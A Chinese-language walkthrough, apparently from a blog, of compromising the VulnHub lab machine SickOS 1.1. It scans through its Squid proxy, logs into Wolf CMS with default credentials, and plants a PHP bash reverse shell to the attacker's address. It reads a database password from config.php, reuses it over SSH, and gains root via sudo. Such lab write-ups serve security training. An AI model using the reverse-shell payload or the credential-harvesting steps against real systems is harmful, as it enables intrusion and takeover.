sickos 靶机渗透(wolf cms 渗透,squid 代理)

2024-08-30 22:20

本文主要是介绍sickos 靶机渗透(wolf cms 渗透,squid 代理),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

靶机信息

vulnhub靶机

主机发现

192.168.50.152 为靶机Ip

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:56 CST
Nmap scan report for 192.168.50.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.152
Host is up (0.000086s latency).
MAC Address: 00:0C:29:45:FB:71 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:FE:9D:85 (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.89 seconds

扫靶机的端口

两个开放的端口

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:02 CST
Nmap scan report for 192.168.50.152
Host is up (0.00026s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)Nmap done: 1 IP address (1 host up) scanned in 26.35 seconds

tcp扫
openssh 在22端口

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sT -sV -O -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:05 CST
Nmap scan report for 192.168.50.152
Host is up (0.00046s latency).PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.10 - 4.11 (92%), Linux 3.13 (91%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 3.10 (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.96 seconds

udp扫一下看看

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sU -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:08 CST
Nmap scan report for 192.168.50.152
Host is up (0.00030s latency).PORT     STATE         SERVICE
22/udp   open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:45:FB:71 (VMware)Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

漏洞脚本扫描看看

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap --script=vuln -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:09 CST
Nmap scan report for 192.168.50.152
Host is up (0.00033s latency).PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

渗透

3128端口
在这里插入图片描述

目录爆破

dirb扫一下

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo dirb http://192.168.50.152:3128/-----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Fri Aug 30 10:26:10 2024
URL_BASE: http://192.168.50.152:3128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.50.152:3128/ ---------------------
END_TIME: Fri Aug 30 10:26:21 2024
DOWNLOADED: 4612 - FOUND: 0

gobuster

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo gobuster dir -u http://192.168.50.152:3128/ -w /usr/share/wordlists/dirbuster/directories.jbrofuzz
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.50.152:3128/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.50.152:3128/b81e40f1-1fe8-408c-a188-83cb028e2898 => 400 (Length: 3223). To continue please exclude the status code or the length

设置代理扫描

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo dirb http://192.168.50.152/ -p http://192.168.50.152:3128/                                        -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Fri Aug 30 15:35:15 2024
URL_BASE: http://192.168.50.152/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.50.152:3128/-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.50.152/ ----
+ http://192.168.50.152/cgi-bin/ (CODE:403|SIZE:290)                                                                      
+ http://192.168.50.152/connect (CODE:200|SIZE:109)                                                                       
+ http://192.168.50.152/index (CODE:200|SIZE:21)                                                                          
+ http://192.168.50.152/index.php (CODE:200|SIZE:21)                                                                      
+ http://192.168.50.152/robots (CODE:200|SIZE:45)                                                                         
+ http://192.168.50.152/robots.txt (CODE:200|SIZE:45)                                                                     
+ http://192.168.50.152/server-status (CODE:403|SIZE:295)                                                                 -----------------
END_TIME: Fri Aug 30 15:35:17 2024
DOWNLOADED: 4612 - FOUND: 7

浏览器也使用代理

在这里插入图片描述看看robots.txt
在这里插入图片描述看看/wolfcms
在这里插入图片描述搜索一下 wolf cms 的后台路径

后台路径/?/admin/login

account: admin
password: admin

来一个一句话, 写在article里

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'");?>

监听, 点击article让php代码加载

拿到shell
在这里插入图片描述

里边看看

┌──(kali㉿kali)-[~]
└─$ sudo ncat -lvnp 443    
[sudo] password for kali: 
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.50.152:45110.
bash: no job control in this shell
www-data@SickOs:/var/www/wolfcms$ whoami
whoami
www-data
www-data@SickOs:/var/www/wolfcms$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ffinet 192.168.50.152/24 brd 192.168.50.255 scope global eth0valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fe45:fb71/64 scope link valid_lft forever preferred_lft forever
www-data@SickOs:/var/www/wolfcms$ 

看一看配置文件config.php

?php// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);// The number of seconds before the check for a new Wolf version times out in ca
se of problems.
define('CHECK_TIMEOUT', 3);"config.php" 85L, 3058C                                       1,1           Top

似乎有东西, root 和 john@123

看一看passwd

www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false                                                                                                                                                                  
messagebus:x:102:105::/var/run/dbus:/bin/false                                                                                                                                                             
whoopsie:x:103:106::/nonexistent:/bin/false                                                                                                                                                                
landscape:x:104:109::/var/lib/landscape:/bin/false                                                                                                                                                         
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin                                                                                                                                                          
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash                                                                                                                                                        
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false                                                                                                                                                    
www-data@SickOs:/var/www/wolfcms$     

unam -a 查看内核信息

www-data@SickOs:/var/www/wolfcms$ uname -a                                                                                                                                                                 
uname -a                                                                                                                                                                                                   
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux                                                                                             
www-data@SickOs:/var/www/wolfcms$  

尝试以sickos登录ssh

sudo ssh sickos@192.168.50.152

password: john@123

sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ffinet 192.168.50.152/24 brd 192.168.50.255 scope global eth0valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fe45:fb71/64 scope link valid_lft forever preferred_lft forever
sickos@SickOs

查看当前权限账户 sudo -l

sickos@SickOs:~$ sudo -l
[sudo] password for sickos: 
Matching Defaults entries for sickos on this host:env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser sickos may run the following commands on this host:(ALL : ALL) ALL
sickos@SickOs:~$ 

新起一个bash,可获得root权限

sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ffinet 192.168.50.152/24 brd 192.168.50.255 scope global eth0valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fe45:fb71/64 scope link valid_lft forever preferred_lft forever
root@SickOs:~# whoami
root
root@SickOs:~# 

找找 flag

root@SickOs:~# ls
root@SickOs:~# pwd
/home/sickos
root@SickOs:~# cd /root
root@SickOs:/root# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt 
If you are viewing this!!ROOT!You have Succesfully completed SickOS1.1.
Thanks for Tryingroot@SickOs:/root# 

拿下
在这里插入图片描述

总结

主机发现阶段的tcp扫描
开放了22, 3128, 8080, 但是8080关闭
3128开放了squid服务,起代理作用
用3128做代理,访问8080,看到web页面
使用dirb -p 代理,爆破8080的目录
发现8080的robots文件,找到/wolfcms目录
是一个wolfcms的后台路径,/?/admin/login
搜索默认密码,admin admin
观察,发现可执行php,反弹个shell
拿到一个初级shell, 用户为www-data
使用ls 看到config.php, 发现可能的用户名root,可能的密码john@123
查看/etc/passwd, 找到可能的用户
使用密码尝试连接ssh, 发现用户sickos使用了密码john@123作为密码
拿到用户sickos的shell,查看用户权限sudo -l
使用sudo /bin/bash来提权,拿到root的shell
找flag,拿下

这篇关于sickos 靶机渗透(wolf cms 渗透,squid 代理)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1122096

相关文章

高效+灵活,万博智云全球发布AWS无代理跨云容灾方案!

摘要 近日,万博智云推出了基于AWS的无代理跨云容灾解决方案,并与拉丁美洲,中东,亚洲的合作伙伴面向全球开展了联合发布。这一方案以AWS应用环境为基础,将HyperBDR平台的高效、灵活和成本效益优势与无代理功能相结合,为全球企业带来实现了更便捷、经济的数据保护。 一、全球联合发布 9月2日,万博智云CEO Michael Wong在线上平台发布AWS无代理跨云容灾解决方案的阐述视频,介绍了

在JS中的设计模式的单例模式、策略模式、代理模式、原型模式浅讲

1. 单例模式(Singleton Pattern) 确保一个类只有一个实例,并提供一个全局访问点。 示例代码: class Singleton {constructor() {if (Singleton.instance) {return Singleton.instance;}Singleton.instance = this;this.data = [];}addData(value)

proxy代理解决vue中跨域问题

vue.config.js module.exports = {...// webpack-dev-server 相关配置devServer: {host: '0.0.0.0',port: port,open: true,proxy: {'/api': {target: `https://vfadmin.insistence.tech/prod-api`,changeOrigin: true,p

Linux如何做ssh反向代理

SSH反向代理是一种通过SSH协议实现的安全远程访问方式,它允许客户端通过SSH连接到一台具有公网IP的代理服务器,然后这台代理服务器再将请求转发给内部网络中的目标主机。以下是实现SSH反向代理的步骤: 一、准备工作 确保服务器配置: 内网服务器(目标主机)和外网服务器(代理服务器)都安装了SSH服务,并且能够通过SSH进行互相访问。内网服务器上的服务(如Web服务、数据库服务等)需要在本地

将你的github仓库设置为web代理

将你的github仓库设置为web代理 废话不多说,直接上步骤 废话不多说,直接上步骤 创建一个仓库,上传静态web。 2. 设置仓库的 page 1)点击 “Settings” 如图设置

Nginx反向代理功能及动静分离实现

一:Nginx支持正向代理和反向代理 1.正向代理 正向代理,指的是通过代理服务器 代理浏览器/客户端去重定向请求访问到目标服务器 的一种代理服务。 正向代理服务的特点是代理服务器 代理的对象是浏览器/客户端,也就是对于目标服务器 来说浏览器/客户端是隐藏的。 正向代理是客户端指定让代理去访问哪个服务,代表客户端的利益。 2.反向代理 反向代理,指的是浏览器/客户端并不知道自己要

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

Nginx跨域运行案例:云台控制http请求,通过 http server 代理转发功能,实现跨域运行。(基于大华摄像头WEB无插件开发包)

文章目录 引言I 跨域运行案例开发资源测试/生产环境,Nginx代理转发,实现跨域运行本机开发运行 II nginx的location指令Nginx配置中, 获取自定义请求header头Nginx 配置中,获取URL参数 引言 背景:全景监控 需求:感知站点由于云台相关操作为 http 请求,http 请求受浏览器跨域限制,不能直接访问,因此需要进行 http 的代理,实

黑马程序员---代理

分析代理类的作用与原理及AOP的概念 代理的概念与作用  1.已经写好一个类,现在要为这个类增加一些功能,例如,异常处理、日志、计算方法的运行时间、事务管理、等等,你准备如何做? 现在我们写一个代理类: 保持了原来那个类的功能,又增加了你现在需要的功能。 主函数调用的时候,直接调用代理类就行了。 这就是代理类的功能。   2.编写一个与目标类具有相同接口的代理类,代理

探寻 IP 代理地址繁多之因

在当今的网络天地里,IP 代理服务随处可见,且令人称奇的是,它们常常手握海量的 IP 地址可供挑选。那么,究竟是什么原因使得 IP 代理拥有如此众多的地址呢?现在,就让我们一同深入探究这个神秘现象背后的缘由。 从实际需求层面出发,不同的用户身处各异的使用场景,怀揣着不同的目的。企业在进行大规模数据采集时,往往期望避免被目标网站认定为单一来源进而遭到访问限制。在这种情况下,数量庞大的不同 IP